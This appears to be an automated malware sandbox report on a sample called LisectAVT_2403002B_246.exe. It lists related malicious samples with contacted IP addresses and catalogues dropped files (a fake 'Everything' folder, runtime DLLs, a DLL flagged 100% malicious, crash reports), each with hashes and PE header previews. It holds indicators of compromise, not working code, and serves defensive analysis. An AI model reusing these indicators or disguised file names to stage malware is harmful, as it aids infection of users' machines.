	LisectAVT_2403002B_318.exe	Get hash	malicious	XRed	Browse	43.153.232.151 43.152.64.207 159.75.57.36
	LisectAVT_2403002B_327.exe	Get hash	malicious	XRed	Browse	43.153.232.151 43.152.64.207 159.75.57.36
	LisectAVT_2403002B_331.exe	Get hash	malicious	Unknown	Browse	43.153.232.151 43.152.64.207 159.75.57.36

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Program Files (x86)\Everything\msvcp120.dll	LisectAVT_2403002B_295.exe	Get hash	malicious	Unknown	Browse
	LisectAVT_2403002B_295.exe	Get hash	malicious	Unknown	Browse
	LisectAVT_2403002B_78.exe	Get hash	malicious	Unknown	Browse
	LisectAVT_2403002B_78.exe	Get hash	malicious	Unknown	Browse
	3vS3F5eukR.exe	Get hash	malicious	Unknown	Browse
	3vS3F5eukR.exe	Get hash	malicious	Unknown	Browse
	eWIIsxIoe5.exe	Get hash	malicious	Unknown	Browse
	eWIIsxIoe5.exe	Get hash	malicious	Unknown	Browse
	CloudInstaller.zip	Get hash	malicious	Unknown	Browse
	lookworldafs1244.msi	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\Program Files (x86)\Everything\4.bin

Download File

Process:	C:\Users\user\Desktop\LisectAVT_2403002B_246.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	477
Entropy (8bit):	5.654004064684553
Encrypted:	false
SSDEEP:	12:TM3iu5vw5puA9WZSEprCADmQWpUeb/XOaGUPUG/zHkojXbv:qV5o5pV4prCsWpUeb/++UukorL
MD5:	B07505384106D6DCCD5178D888116A7E
SHA1:	4FFE1C9E180EE42A5BDCA3C8F8A38AEC75F2A99C
SHA-256:	FF934B9DB5A3BFB40B9575EE0A94AB5F8E2134816DBF1DE39F2AFDEB27CC5916
SHA-512:	B913673A6FDBC840B1D25C142DE1B6C269E75E905529F34C7CEF75F5116953F48F0B17036C447B42F82042A7F385DC169737B1CD1D56923E5D92F1D20929F1A2
Malicious:	false
Reputation:	low
Preview:	<?xml version='1.0' encoding='utf-8' ?>.<Error>..<Code>UnavailableForLegalReasons</Code>..<Message>Due to your account is arrears, it is unavailable until you recharge.</Message>..<Resource>/qd.bin</Resource>..<RequestId>NjZhMjViN2VfNGYxNDdiMGJfYTNjOF8yMzMxYjdi</RequestId>..<TraceId>OGVmYzZiMmQzYjA2OWNhODk0NTRkMTBiOWVmMDAxODc0OWRkZjk0ZDM1NmI1M2E2MTRlY2MzZDhmNmI5MWI1OTVlYmNhYjQwZWZiOTI4YWY0MTRiOWU0YzQ3ZmVhMjQ3MmIzZjU5NDVmMTI0ZDFhMTNhODBhOTVmZmJiYzEyNzA=</TraceId>.</Error>..

C:\Program Files (x86)\Everything\Everything.exe

Download File

Process:	C:\Users\user\Desktop\LisectAVT_2403002B_246.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	22920
Entropy (8bit):	6.723474063606494
Encrypted:	false
SSDEEP:	384:29BXkFiGvkOpAxufYw41MgDGlBAM+o/8E9VF0NyMCy:29B0FiSkArQw2MgDGLAMxkE2
MD5:	94079169014ABCE2F6D26677897D3CA1
SHA1:	F9CF7C2A0A41E97998BBAF47954CBA3024DA9E84
SHA-256:	F5D3846B670FC95F3D33CF29E7BE1692FF09F09F5D2E8C2DACF271AA00F4A5A3
SHA-512:	749DDB94153DF2D0A506D1EAE2CA38BAD3167560D3312958C10B9C3554086D3CB95B1CBC88B504740B394A82FD1491924FE899775A027363C426C052A333F579
Malicious:	true
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......n\|.Q.@..@..@.#e.. .@..CA.(.@..CC.+.@..CE.8.@..CD.'.@....(.@..CA.).@..A...@..CI.+.@..C..+.@..CB.+.@.Rich*.@.........................PE..L......e..........".................I........ ....@..........................p.......%....@.................................,%.......P...............&...3...`..<....!..p...........................p!..@............ ...............................text............................... ..`.rdata..p.... ......................@..@.data........0......................@....gfids.. ....@......................@..@.rsrc........P....... ..............@..@.reloc..<....`.......$..............@..B........................................................................................................................................................................................................................................................

C:\Program Files (x86)\Everything\app_core_legacy.dll

Download File

Process:	C:\Users\user\Desktop\LisectAVT_2403002B_246.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	10240
Entropy (8bit):	5.202221702110796
Encrypted:	false
SSDEEP:	192:Y2lzYEX2FnZjzG8jWJjFjOLd3MzCp4HFWRfB:7REzYJjFjCdQCpcW
MD5:	5E4ED4C5E1053D9C6CCA98C0391FAFBD
SHA1:	C79993C05F66268279F56FC07A11B925527808EC
SHA-256:	033750A55FAE1731AE8503E84BEC35671ECD996B6CEDB8515DEE2272D9E038AB
SHA-512:	871914B26E88F48103FBF769FE49B2017DE07F50F5510D23B1A99066CDE6481CB7A73A7D8DFD672DF62A22AF18F1AF46CF9FF7DFC2CE53F5E52C41A8C7F432BE
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........._..O1.O1.O1.7..O1.s.0.O1.s.4.O1.s.5.O1.s.2.O1..70.O1.O0.O1.^.8.O1.^...O1.^.3.O1.Rich.O1.........PE..L....s.e...........!...'..................... ...............................p............@..................................5..d....P.......................`..T....1..p............................0..@............0...............................text...{........................... ..`.bss....x.... ...........................rdata..:....0......................@..@.data...q....@......................@....rsrc........P.......$..............@..@.reloc..T....`.......&..............@..B................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Everything\msvcp120.dll

Download File

Process:	C:\Users\user\Desktop\LisectAVT_2403002B_246.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	455328
Entropy (8bit):	6.698367093574994
Encrypted:	false
SSDEEP:	12288:uZ/8wcqw2oe+Z3VrfwfNOOoWhUgiW6QR7t5ss3Ooc8DHkC2e77/:W/8wVwHZFTwFOOos3Ooc8DHkC2e77/
MD5:	FD5CABBE52272BD76007B68186EBAF00
SHA1:	EFD1E306C1092C17F6944CC6BF9A1BFAD4D14613
SHA-256:	87C42CA155473E4E71857D03497C8CBC28FA8FF7F2C8D72E8A1F39B71078F608
SHA-512:	1563C8257D85274267089CD4AEAC0884A2A300FF17F84BDB64D567300543AA9CD57101D8408D0077B01A600DDF2E804F7890902C2590AF103D2C53FF03D9E4A5
Malicious:	false
Joe Sandbox View:	Filename: LisectAVT_2403002B_295.exe, Detection: malicious, Browse Filename: LisectAVT_2403002B_295.exe, Detection: malicious, Browse Filename: LisectAVT_2403002B_78.exe, Detection: malicious, Browse Filename: LisectAVT_2403002B_78.exe, Detection: malicious, Browse Filename: 3vS3F5eukR.exe, Detection: malicious, Browse Filename: 3vS3F5eukR.exe, Detection: malicious, Browse Filename: eWIIsxIoe5.exe, Detection: malicious, Browse Filename: eWIIsxIoe5.exe, Detection: malicious, Browse Filename: CloudInstaller.zip, Detection: malicious, Browse Filename: lookworldafs1244.msi, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......o...+.N+.N+.N.3wN).N+.N..Nm.aN(.Nm.cN#.Nm.]N..Nm.\Ne.Nm.YN-.Nm.`N.Nm.gN.Nm.bN*.NRich+.N........................PE..L....\|OR.........."!.........................0.......................................x....@..........................W..L...<...<........................>.......D...................................K..@...............<............................text...<........................... ..`.data....^...0...0... ..............@....idata...............P..............@..@.rsrc................j..............@..@.reloc...D.......F...n..............@..B........................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Everything\msvcp140.dll

Download File

Process:	C:\Users\user\Desktop\LisectAVT_2403002B_246.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	446840
Entropy (8bit):	6.690279428020546
Encrypted:	false
SSDEEP:	12288:5mtyWf0sTWRzbpT/tD5YpsGx30h7whUgiW6QR7t5s03Ooc8dHkC2es98R:A0HsTWRzbp5D5YpsM3A7v03Ooc8dHkCh
MD5:	C766CA0482DFE588576074B9ED467E38
SHA1:	5AC975CCCE81399218AB0DD27A3EFFC5B702005E
SHA-256:	85AA8C8AB4CBF1FF9AE5C7BDE1BF6DA2E18A570E36E2D870B88536B8658C5BA8
SHA-512:	EE36BC949D627B06F11725117D568F9CF1A4D345A939D9B4C46040E96C84159FA741637EF3D73ED2D01DF988DE59A573C3574308731402EB52BAE2329D7BDDAC
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........O.$...w...w...w.\.v...w.V@w...w..v...w...w...w..v...w..v...w..vD..w..v...w.,w...w..v...wRich...w........................PE..L....4.w.........."!...&.....z...............0.......................................=....@A.........................S......8c..........................xO.......4...U..T...........................8U..@............`..0............................text...b........................... ..`.data....&...0......................@....idata..0....`.......0..............@..@.rsrc................H..............@..@.reloc...4.......6...L..............@..B........................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Everything\msvcr120.dll

Download File

Process:	C:\Users\user\Desktop\LisectAVT_2403002B_246.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	970912
Entropy (8bit):	6.9649735952029515
Encrypted:	false
SSDEEP:	12288:LBmFyjLAOQaYkxGXPfY7eiWWcpOKnpTVOIxhK765qlRRb6x4pI23IbJQV:dmFyjLF847eiWWcoGZVOIxh/WxIAIbGV
MD5:	034CCADC1C073E4216E9466B720F9849
SHA1:	F19E9D8317161EDC7D3E963CC0FC46BD5E4A55A1
SHA-256:	86E39B5995AF0E042FCDAA85FE2AEFD7C9DDC7AD65E6327BD5E7058BC3AB615F
SHA-512:	5F11EF92D936669EE834A5CEF5C7D0E7703BF05D03DC4F09B9DCFE048D7D5ADFAAB6A9C7F42E8080A5E9AAD44A35F39F3940D5CCA20623D9CAFE373C635570F7
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S9...XlA.XlA.XlA..A.XlA.XmA.XlAQ..A.ZlAQ..AvXlAQ..A!XlAQ..A.XlAQ..A.XlAQ..A.XlAQ..A.XlARich.XlA........PE..L....\|OR.........."!................D............................................... .....@.........................`........R..(....p...................>......d]..@...8...........................H...@............P...............................text............................... ..`.data...4e.......V..................@....idata.......P......................@....rsrc........p.......0..............@..@.reloc..d].......^...4..............@..B................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Everything\vcruntime140.dll

Download File

Process:	C:\Users\user\Desktop\LisectAVT_2403002B_246.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	91104
Entropy (8bit):	6.919609919273454
Encrypted:	false
SSDEEP:	1536:wd5wd+ywOpmlhcsrG4ckZEzH3qDLItnTwfVkC2KecbGJ13yd+zTNFZFzK:wdJywOpmlPrHI6D+nTwvlecbG/3y8XG
MD5:	9C133B18FA9ED96E1AEB2DA66E4A4F2B
SHA1:	238D34DBD80501B580587E330D4405505D5E80F2
SHA-256:	C7D9DFDDBE68CF7C6F0B595690E31A26DF4780F465D2B90B5F400F2D8D788512
SHA-512:	D2D588F9940E7E623022ADEBEBDC5AF68421A8C1024177189D11DF45481D7BFED16400958E67454C84BA97F0020DA559A8DAE2EC41950DC07E629B0FD4752E2F
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................2........I..............o.......o.......o.......o.......o%......o......Rich............PE..L....s............"!...&............P........................................P...........@A........................@........ .......0...................O...@.......$..T............................#..@............ ...............................text...T........................... ..`.data...d...........................@....idata....... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_LisectAVT_240300_5d9c73d78c4262b74a2a23681a113041a823c279_fe420846_b4747013-6ef0-4cc8-95bf-59303275033e\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.0158040977185034
Encrypted:	false
SSDEEP:	192:az4V0+LQh7yvN0BU//c7jHjn/zuiFWZ24IO8Tp1:3dUy2BU/4jzzuiFWY4IO83
MD5:	B481FB33A40EE9F566DDA88D76E46025
SHA1:	3A8AC0EDBFDFE5A5025A16CB3F16283525D90361
SHA-256:	8ADC6B155220E645F1F4F85A6BA0D0F85351830E096B20BC4BF97BA7F18CE9CA
SHA-512:	06E98E5E55CA491A4C86C7F7B3E7458F3478AFB13BA67C94BCBACDFDE645FD234774EB5C6F38AFE773E897581A6E2CB513FD571BB2378F20272F2BE097159278
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.6.3.8.9.8.8.6.7.7.2.8.9.3.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.6.3.8.9.8.8.8.1.4.7.8.8.1.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.4.7.4.7.0.1.3.-.6.e.f.0.-.4.c.c.8.-.9.5.b.f.-.5.9.3.0.3.2.7.5.0.3.3.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.6.4.0.4.a.9.9.-.8.0.d.8.-.4.9.5.8.-.a.c.d.f.-.7.a.3.a.0.8.f.f.d.d.f.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.L.i.s.e.c.t.A.V.T._.2.4.0.3.0.0.2.B._.2.4.6...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.a.0.-.0.0.0.1.-.0.0.1.4.-.e.4.0.f.-.9.6.8.d.9.b.d.e.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.f.6.a.3.b.6.4.a.d.c.4.8.8.a.9.0.f.9.d.9.8.9.9.1.6.8.2.3.4.2.9.0.0.0.0.f.f.f.f.!.0.0.0.0.7.e.c.a.9.a.c.a.8.0.2.5.1.2.f.e.3.4.5.f.5.5.b.b.5.a.a.9.6.9.f.3.8.4.f.3.e.9.3.4.!.L.i.s.e.c.t.A.V.T._.2.4.0.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER677C.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Thu Jul 25 14:04:47 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	125650
Entropy (8bit):	1.9339133385846927
Encrypted:	false
SSDEEP:	384:lXcEsumKiHtrQpCXSMFa7B/qOcwdT4eM4+hfR8OK4aJDEdZAQTApJ:KEHxiHZQpCXSMFWVdcwt4eM4Mjag01pJ
MD5:	E0752A55056F1C2BE2A2F13C5FF1E424
SHA1:	92C261863EDFE1B8BBB7ABB8EF951AD425328F2F
SHA-256:	28E2E8EAAD77C23C5FF1C23728058390C34BB043E7C2F7AFAAB1781697B160CB
SHA-512:	BA72FA5CC721A7055608CC15E51F6C5426F1F74AC221C23FBD905671818081A308C94F271563639C0A8F59DCF5B01B9EC03A597C92D54E47A2F0F3859A8C8038
Malicious:	false
Preview:	MDMP..a..... ........[.f........................\|...........D...rL..........T.......8...........T...........0N...............!...........#..............................................................................eJ.......$......GenuineIntel............T...........g[.f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6BF2.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8420
Entropy (8bit):	3.707754027725112
Encrypted:	false
SSDEEP:	192:R6l7wVeJSWE6uu6Y9SSUHn4gmfhRMxprj89bUAsfYkcm:R6lXJ+6X6YISUH4gmfnMoUTfN
MD5:	671E27D15DEFC7AFBBC132539EEA9554
SHA1:	3B4B304273B6464ABED07777FEC7011817DB0636
SHA-256:	E2234CCA808DE17BD20E2DF5076B4E2BBC5967A0C37495FCF6C8A8EA7269C4F4
SHA-512:	8F8849DBB0BD06CB6AD968EC43C37F20DB682F213034C135AAF0D34C60EFCE3F599AE8B23A4D5B84DF4267CE0B007EDF24B2289D725E63A1983FC388CFA5A1A6
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.3.2.8.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6C31.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4679
Entropy (8bit):	4.523099064302316
Encrypted:	false
SSDEEP:	48:cvIwWl8zsQJg77aI9VSWpW8VYpYm8M4JS7uF/1X+q8igolyA+7ZlhQd:uIjfWI7Dz7VZJmaDhlyA+1lhQd
MD5:	74D8C6AF4115DA89F0E41907AEADE542
SHA1:	98BA3E4A3F89B3619710796DDB2687AABA3A081D
SHA-256:	BAC683AA604567AFC1E1C65F2B2CBC7A3E98240DD2029199E51F8DED28BA745D
SHA-512:	F6022CE8A5C9052A1F9D737E3B810D4FE9DE5AC8C324BB1009E6B1509121264321E041DE8F61EA65C36A860DA3BC032706E2131AAB3EEF724422391D4E941AE2
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="426547" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\PluginLauncher[1].exe

Download File

Process:	C:\Users\user\Desktop\LisectAVT_2403002B_246.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	22920
Entropy (8bit):	6.723474063606494
Encrypted:	false
SSDEEP:	384:29BXkFiGvkOpAxufYw41MgDGlBAM+o/8E9VF0NyMCy:29B0FiSkArQw2MgDGLAMxkE2
MD5:	94079169014ABCE2F6D26677897D3CA1
SHA1:	F9CF7C2A0A41E97998BBAF47954CBA3024DA9E84
SHA-256:	F5D3846B670FC95F3D33CF29E7BE1692FF09F09F5D2E8C2DACF271AA00F4A5A3
SHA-512:	749DDB94153DF2D0A506D1EAE2CA38BAD3167560D3312958C10B9C3554086D3CB95B1CBC88B504740B394A82FD1491924FE899775A027363C426C052A333F579
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......n\|.Q.@..@..@.#e.. .@..CA.(.@..CC.+.@..CE.8.@..CD.'.@....(.@..CA.).@..A...@..CI.+.@..C..+.@..CB.+.@.Rich*.@.........................PE..L......e..........".................I........ ....@..........................p.......%....@.................................,%.......P...............&...3...`..<....!..p...........................p!..@............ ...............................text............................... ..`.rdata..p.... ......................@..@.data........0......................@....gfids.. ....@......................@..@.rsrc........P....... ..............@..@.reloc..<....`.......$..............@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll

Download File

Process:	C:\Users\user\Desktop\LisectAVT_2403002B_246.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	446840
Entropy (8bit):	6.690279428020546
Encrypted:	false
SSDEEP:	12288:5mtyWf0sTWRzbpT/tD5YpsGx30h7whUgiW6QR7t5s03Ooc8dHkC2es98R:A0HsTWRzbp5D5YpsM3A7v03Ooc8dHkCh
MD5:	C766CA0482DFE588576074B9ED467E38
SHA1:	5AC975CCCE81399218AB0DD27A3EFFC5B702005E
SHA-256:	85AA8C8AB4CBF1FF9AE5C7BDE1BF6DA2E18A570E36E2D870B88536B8658C5BA8
SHA-512:	EE36BC949D627B06F11725117D568F9CF1A4D345A939D9B4C46040E96C84159FA741637EF3D73ED2D01DF988DE59A573C3574308731402EB52BAE2329D7BDDAC
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........O.$...w...w...w.\.v...w.V@w...w..v...w...w...w..v...w..v...w..vD..w..v...w.,w...w..v...wRich...w........................PE..L....4.w.........."!...&.....z...............0.......................................=....@A.........................S......8c..........................xO.......4...U..T...........................8U..@............`..0............................text...b........................... ..`.data....&...0......................@....idata..0....`.......0..............@..@.rsrc................H..............@..@.reloc...4.......6...L..............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msvcr120[1].dll

Download File

Process:	C:\Users\user\Desktop\LisectAVT_2403002B_246.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	970912
Entropy (8bit):	6.9649735952029515
Encrypted:	false
SSDEEP:	12288:LBmFyjLAOQaYkxGXPfY7eiWWcpOKnpTVOIxhK765qlRRb6x4pI23IbJQV:dmFyjLF847eiWWcoGZVOIxh/WxIAIbGV
MD5:	034CCADC1C073E4216E9466B720F9849
SHA1:	F19E9D8317161EDC7D3E963CC0FC46BD5E4A55A1
SHA-256:	86E39B5995AF0E042FCDAA85FE2AEFD7C9DDC7AD65E6327BD5E7058BC3AB615F
SHA-512:	5F11EF92D936669EE834A5CEF5C7D0E7703BF05D03DC4F09B9DCFE048D7D5ADFAAB6A9C7F42E8080A5E9AAD44A35F39F3940D5CCA20623D9CAFE373C635570F7
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S9...XlA.XlA.XlA..A.XlA.XmA.XlAQ..A.ZlAQ..AvXlAQ..A!XlAQ..A.XlAQ..A.XlAQ..A.XlAQ..A.XlARich.XlA........PE..L....\|OR.........."!................D............................................... .....@.........................`........R..(....p...................>......d]..@...8...........................H...@............P...............................text............................... ..`.data...4e.......V..................@....idata.......P......................@....rsrc........p.......0..............@..@.reloc..d].......^...4..............@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll

Download File

Process:	C:\Users\user\Desktop\LisectAVT_2403002B_246.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	91104
Entropy (8bit):	6.919609919273454
Encrypted:	false
SSDEEP:	1536:wd5wd+ywOpmlhcsrG4ckZEzH3qDLItnTwfVkC2KecbGJ13yd+zTNFZFzK:wdJywOpmlPrHI6D+nTwvlecbG/3y8XG
MD5:	9C133B18FA9ED96E1AEB2DA66E4A4F2B
SHA1:	238D34DBD80501B580587E330D4405505D5E80F2
SHA-256:	C7D9DFDDBE68CF7C6F0B595690E31A26DF4780F465D2B90B5F400F2D8D788512
SHA-512:	D2D588F9940E7E623022ADEBEBDC5AF68421A8C1024177189D11DF45481D7BFED16400958E67454C84BA97F0020DA559A8DAE2EC41950DC07E629B0FD4752E2F
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................2........I..............o.......o.......o.......o.......o%......o......Rich............PE..L....s............"!...&............P........................................P...........@A........................@........ .......0...................O...@.......$..T............................#..@............ ...............................text...T........................... ..`.data...d...........................@....idata....... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\MSASN1[1].dll

Download File

Process:	C:\Users\user\Desktop\LisectAVT_2403002B_246.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	10240
Entropy (8bit):	5.202221702110796
Encrypted:	false
SSDEEP:	192:Y2lzYEX2FnZjzG8jWJjFjOLd3MzCp4HFWRfB:7REzYJjFjCdQCpcW
MD5:	5E4ED4C5E1053D9C6CCA98C0391FAFBD
SHA1:	C79993C05F66268279F56FC07A11B925527808EC
SHA-256:	033750A55FAE1731AE8503E84BEC35671ECD996B6CEDB8515DEE2272D9E038AB
SHA-512:	871914B26E88F48103FBF769FE49B2017DE07F50F5510D23B1A99066CDE6481CB7A73A7D8DFD672DF62A22AF18F1AF46CF9FF7DFC2CE53F5E52C41A8C7F432BE
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........._..O1.O1.O1.7..O1.s.0.O1.s.4.O1.s.5.O1.s.2.O1..70.O1.O0.O1.^.8.O1.^...O1.^.3.O1.Rich.O1.........PE..L....s.e...........!...'..................... ...............................p............@..................................5..d....P.......................`..T....1..p............................0..@............0...............................text...{........................... ..`.bss....x.... ...........................rdata..:....0......................@..@.data...q....@......................@....rsrc........P.......$..............@..@.reloc..T....`.......&..............@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp120[1].dll

Download File

Process:	C:\Users\user\Desktop\LisectAVT_2403002B_246.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	455328
Entropy (8bit):	6.698367093574994
Encrypted:	false
SSDEEP:	12288:uZ/8wcqw2oe+Z3VrfwfNOOoWhUgiW6QR7t5ss3Ooc8DHkC2e77/:W/8wVwHZFTwFOOos3Ooc8DHkC2e77/
MD5:	FD5CABBE52272BD76007B68186EBAF00
SHA1:	EFD1E306C1092C17F6944CC6BF9A1BFAD4D14613
SHA-256:	87C42CA155473E4E71857D03497C8CBC28FA8FF7F2C8D72E8A1F39B71078F608
SHA-512:	1563C8257D85274267089CD4AEAC0884A2A300FF17F84BDB64D567300543AA9CD57101D8408D0077B01A600DDF2E804F7890902C2590AF103D2C53FF03D9E4A5
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......o...+.N+.N+.N.3wN).N+.N..Nm.aN(.Nm.cN#.Nm.]N..Nm.\Ne.Nm.YN-.Nm.`N.Nm.gN.Nm.bN*.NRich+.N........................PE..L....\|OR.........."!.........................0.......................................x....@..........................W..L...<...<........................>.......D...................................K..@...............<............................text...<........................... ..`.data....^...0...0... ..............@....idata...............P..............@..@.rsrc................j..............@..@.reloc...D.......F...n..............@..B........................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.465540581001569
Encrypted:	false
